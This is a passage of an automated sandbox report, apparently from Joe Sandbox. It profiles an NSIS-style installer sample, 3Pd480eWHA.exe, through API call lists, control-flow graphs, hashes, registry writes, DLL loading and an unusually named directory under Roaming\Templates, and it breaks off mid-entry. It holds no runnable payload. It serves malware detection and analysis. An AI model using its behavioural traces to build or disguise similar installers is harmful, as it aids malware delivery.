                                                                                              • lstrlenA.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp\System.dll,00000000,0078FCF8,771B23A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000,?), ref: 00404F5E
                                                                                              • lstrlenA.KERNEL32(00402FD7,Skipped: C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp\System.dll,00000000,0078FCF8,771B23A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000), ref: 00404F6E
                                                                                              • lstrcatA.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp\System.dll,00402FD7,00402FD7,Skipped: C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp\System.dll,00000000,0078FCF8,771B23A0), ref: 00404F81
                                                                                              • SetWindowTextA.USER32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp\System.dll,Skipped: C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp\System.dll), ref: 00404F93
                                                                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FB9
                                                                                              • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FD3
                                                                                              • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FE1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                              • String ID: Skipped: C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp\System.dll
                                                                                              • API String ID: 2531174081-4205962734
                                                                                              • Opcode ID: 8aca45e27811aa21f79b642ec133e9ff2e42e250cada4605035ec104fac27bf5
                                                                                              • Instruction ID: b1dc6bec94ba42b715134808c0c3c35089c42976f802e7ea77bea70e7b84fba8
                                                                                              • Opcode Fuzzy Hash: 8aca45e27811aa21f79b642ec133e9ff2e42e250cada4605035ec104fac27bf5
                                                                                              • Instruction Fuzzy Hash: 1F21817190011DBFDF119FA5DD449DEBFA9EF45354F04807AFA04A6291C7388E409BA8

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 835 4053eb-405436 CreateDirectoryA 836 405438-40543a 835->836 837 40543c-405449 GetLastError 835->837 838 405463-405465 836->838 837->838 839 40544b-40545f SetFileSecurityA 837->839 839->836 840 405461 GetLastError 839->840 840->838
                                                                                              APIs
                                                                                              • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 0040542E
                                                                                              • GetLastError.KERNEL32 ref: 00405442
                                                                                              • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405457
                                                                                              • GetLastError.KERNEL32 ref: 00405461
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                              • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
                                                                                              • API String ID: 3449924974-228423945
                                                                                              • Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                                              • Instruction ID: 8acfd36fb30660db29d177a8be8d7647adb8d58efdd4f3c758bfd1505ce0b010
                                                                                              • Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                                              • Instruction Fuzzy Hash: CF010871D14259EADF119FA4D9447EFBFB8EF04315F004176E904B6290D378A644CFAA

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 841 406037-406057 GetSystemDirectoryA 842 406059 841->842 843 40605b-40605d 841->843 842->843 844 40606d-40606f 843->844 845 40605f-406067 843->845 847 406070-4060a2 wsprintfA LoadLibraryExA 844->847 845->844 846 406069-40606b 845->846 846->847
                                                                                              APIs
                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040604E
                                                                                              • wsprintfA.USER32 ref: 00406087
                                                                                              • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040609B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                              • String ID: %s%s.dll$UXTHEME$\
                                                                                              • API String ID: 2200240437-4240819195
                                                                                              • Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                                              • Instruction ID: 17439860729f5247506b6fa79cc71e4dc0dc9fec6db89644704a68070b9bc3a3
                                                                                              • Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                                              • Instruction Fuzzy Hash: BAF0F630A40209ABEB14EB78DC0DFEB365CAB08305F14017AB547F11D2EA78E8258B69

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 848 402e9f-402eb3 849 402eb5 848->849 850 402ebc-402ec5 848->850 849->850 851 402ec7 850->851 852 402ece-402ed3 850->852 851->852 853 402ee3-402ef0 call 40308e 852->853 854 402ed5-402ede call 4030a4 852->854 858 402ef6-402efa 853->858 859 40307c 853->859 854->853 860 402f00-402f26 GetTickCount 858->860 861 403027-403029 858->861 862 40307e-40307f 859->862 865 403084 860->865 866 402f2c-402f34 860->866 863 403069-40306c 861->863 864 40302b-40302e 861->864 867 403087-40308b 862->867 868 403071-40307a call 40308e 863->868 869 40306e 863->869 864->865 870 403030 864->870 865->867 871 402f36 866->871 872 402f39-402f47 call 40308e 866->872 868->859 880 403081 868->880 869->868 874 403033-403039 870->874 871->872 872->859 882 402f4d-402f56 872->882 877 40303b 874->877 878 40303d-40304b call 40308e 874->878 877->878 878->859 886 40304d-403059 call 405a26 878->886 880->865 884 402f5c-402f7c call 406188 882->884 889 402f82-402f95 GetTickCount 884->889 890 40301f-403021 884->890 892 403023-403025 886->892 893 40305b-403065 886->893 894 402f97-402f9f 889->894 895 402fda-402fdc 889->895 890->862 892->862 893->874 896 403067 893->896 897 402fa1-402fa5 894->897 898 402fa7-402fd2 MulDiv wsprintfA call 404f25 894->898 899 403013-403017 895->899 900 402fde-402fe2 895->900 896->865 897->895 897->898 905 402fd7 898->905 899->866 901 40301d 899->901 903 402fe4-402feb call 405a26 900->903 904 402ff9-403004 900->904 901->865 909 402ff0-402ff2 903->909 907 403007-40300b 904->907 905->895 907->884 908 403011 907->908 908->865 909->892 910 402ff4-402ff7 909->910 910->907
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountTick$wsprintf
                                                                                              • String ID: ... %d%%
                                                                                              • API String ID: 551687249-2449383134
                                                                                              • Opcode ID: 64d2ce798d2dc69bad610a2ea0e87ea1e6662520605f5bed10a59724df5d2c56
                                                                                              • Instruction ID: 2f6adf6c827ed57ff932280c4bcb171559557b12de80228d6f8143075edc11b6
                                                                                              • Opcode Fuzzy Hash: 64d2ce798d2dc69bad610a2ea0e87ea1e6662520605f5bed10a59724df5d2c56
                                                                                              • Instruction Fuzzy Hash: 5D519E7280221AABDB10DF65DA44A9F7BB8AF00755F14417BFD10B32C4C7788E51DBAA

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 911 402364-4023aa call 402b2f call 402a3a * 2 RegCreateKeyExA 918 4023b0-4023b8 911->918 919 4028cf-4028de 911->919 921 4023c8-4023cb 918->921 922 4023ba-4023c7 call 402a3a lstrlenA 918->922 925 4023db-4023de 921->925 926 4023cd-4023da call 402a1d 921->926 922->921 927 4023e0-4023ea call 402e9f 925->927 928 4023ef-402403 RegSetValueExA 925->928 926->925 927->928 932 402405 928->932 933 402408-4024de RegCloseKey 928->933 932->933 933->919 936 4026a6-4026ad 933->936 936->919
                                                                                              APIs
                                                                                              • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023A2
                                                                                              • lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023C2
                                                                                              • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023FB
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024D8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateValuelstrlen
                                                                                              • String ID: C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp
                                                                                              • API String ID: 1356686001-2031227991
                                                                                              • Opcode ID: d74034fd92c64aa2ed621a3478c433a983ffe71421c626bffd0a4e4897772b2d
                                                                                              • Instruction ID: 90de9cbbb944b5ce7c16acb051fe3e73370ea29dc9d439d86f68b9f38bc34e97
                                                                                              • Opcode Fuzzy Hash: d74034fd92c64aa2ed621a3478c433a983ffe71421c626bffd0a4e4897772b2d
                                                                                              • Instruction Fuzzy Hash: 04117572E00108BFEB10AFA4EE89EAF767DEB54358F10403AF505B61D1D6B85D419B28

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 937 4059ae-4059b8 938 4059b9-4059e4 GetTickCount GetTempFileNameA 937->938 939 4059f3-4059f5 938->939 940 4059e6-4059e8 938->940 942 4059ed-4059f0 939->942 940->938 941 4059ea 940->941 941->942
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 004059C2
                                                                                              • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059DC
                                                                                              Strings
                                                                                              • nsa, xrefs: 004059B9
                                                                                              • "C:\Users\user\Desktop\3Pd480eWHA.exe", xrefs: 004059AE
                                                                                              • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004059B1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountFileNameTempTick
                                                                                              • String ID: "C:\Users\user\Desktop\3Pd480eWHA.exe"$C:\Users\user~1\AppData\Local\Temp\$nsa
                                                                                              • API String ID: 1716503409-3192989836
                                                                                              • Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                                              • Instruction ID: 14833181556f01f8699e9ecebe408800633a5ab51cc0013a882439dab00eebba
                                                                                              • Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                                              • Instruction Fuzzy Hash: 2AF0E232708204ABEB109F15EC04B9B7B9CDF91720F00C03BFA049A181D2B598448B58

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 943 100016bd-100016f9 call 10001a5d 947 1000180a-1000180c 943->947 948 100016ff-10001703 943->948 949 10001705-1000170b call 100021b0 948->949 950 1000170c-10001719 call 100021fa 948->950 949->950 955 10001749-10001750 950->955 956 1000171b-10001720 950->956 957 10001770-10001774 955->957 958 10001752-1000176e call 100023da call 10001559 call 10001266 GlobalFree 955->958 959 10001722-10001723 956->959 960 1000173b-1000173e 956->960 964 100017b2-100017b8 call 100023da 957->964 965 10001776-100017b0 call 10001559 call 100023da 957->965 980 100017b9-100017bd 958->980 962 10001725-10001726 959->962 963 1000172b-1000172c call 100027e8 959->963 960->955 966 10001740-10001741 call 10002aa3 960->966 968 10001733-10001739 call 10002589 962->968 969 10001728-10001729 962->969 976 10001731 963->976 964->980 965->980 979 10001746 966->979 984 10001748 968->984 969->955 969->963 976->979 979->984 985 100017fa-10001801 980->985 986 100017bf-100017cd call 100023a0 980->986 984->955 985->947 991 10001803-10001804 GlobalFree 985->991 993 100017e5-100017ec 986->993 994 100017cf-100017d2 986->994 991->947 993->985 996 100017ee-100017f9 call 100014e2 993->996 994->993 995 100017d4-100017dc 994->995 995->993 997 100017de-100017df FreeLibrary 995->997 996->985 997->993
                                                                                              APIs
                                                                                                • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                                                • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                                                • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 10001768
                                                                                              • FreeLibrary.KERNEL32(?), ref: 100017DF
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                • Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2
                                                                                                • Part of subcall function 10002589: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025FB
                                                                                                • Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1834191377.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1834168923.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1834213458.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1834234460.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_10000000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                              • String ID:
                                                                                              • API String ID: 1791698881-3916222277
                                                                                              • Opcode ID: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
                                                                                              • Instruction ID: 7bd52774c71d274dd6e07030a7ef65efb9a892d3f5f2eddd47f658e3267813e4
                                                                                              • Opcode Fuzzy Hash: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
                                                                                              • Instruction Fuzzy Hash: B5319C79408205DAFB41DF649CC5BCA37ECFF042D5F018465FA0A9A09EDF78A8858B60
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FBB
                                                                                                • Part of subcall function 00404F25: lstrlenA.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp\System.dll,00000000,0078FCF8,771B23A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000,?), ref: 00404F5E
                                                                                                • Part of subcall function 00404F25: lstrlenA.KERNEL32(00402FD7,Skipped: C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp\System.dll,00000000,0078FCF8,771B23A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000), ref: 00404F6E
                                                                                                • Part of subcall function 00404F25: lstrcatA.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp\System.dll,00402FD7,00402FD7,Skipped: C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp\System.dll,00000000,0078FCF8,771B23A0), ref: 00404F81
                                                                                                • Part of subcall function 00404F25: SetWindowTextA.USER32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp\System.dll,Skipped: C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp\System.dll), ref: 00404F93
                                                                                                • Part of subcall function 00404F25: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FB9
                                                                                                • Part of subcall function 00404F25: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FD3
                                                                                                • Part of subcall function 00404F25: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FE1
                                                                                              • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                              • String ID:
                                                                                              • API String ID: 2987980305-0
                                                                                              • Opcode ID: bfae0568c449fe0c54a0939f3ae7a6896df299a99818b1744bd7ec33484920ac
                                                                                              • Instruction ID: a6d6138a22214a2ec3127db012fcbe8ccdb9873b287714200ab65a7954d0c462
                                                                                              • Opcode Fuzzy Hash: bfae0568c449fe0c54a0939f3ae7a6896df299a99818b1744bd7ec33484920ac
                                                                                              • Instruction Fuzzy Hash: 93212B72904211EBDF217F648E4DAAE76B1AB45318F30423BF311B62D1C7BC4941DA6E
                                                                                              APIs
                                                                                                • Part of subcall function 00405817: CharNextA.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp,?,00405883,C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp,C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp,771B3410,?,C:\Users\user~1\AppData\Local\Temp\,004055CE,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405825
                                                                                                • Part of subcall function 00405817: CharNextA.USER32(00000000), ref: 0040582A
                                                                                                • Part of subcall function 00405817: CharNextA.USER32(00000000), ref: 0040583E
                                                                                              • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                                                • Part of subcall function 004053EB: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 0040542E
                                                                                              • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\synkefrit,00000000,00000000,000000F0), ref: 00401634
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\synkefrit, xrefs: 00401629
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
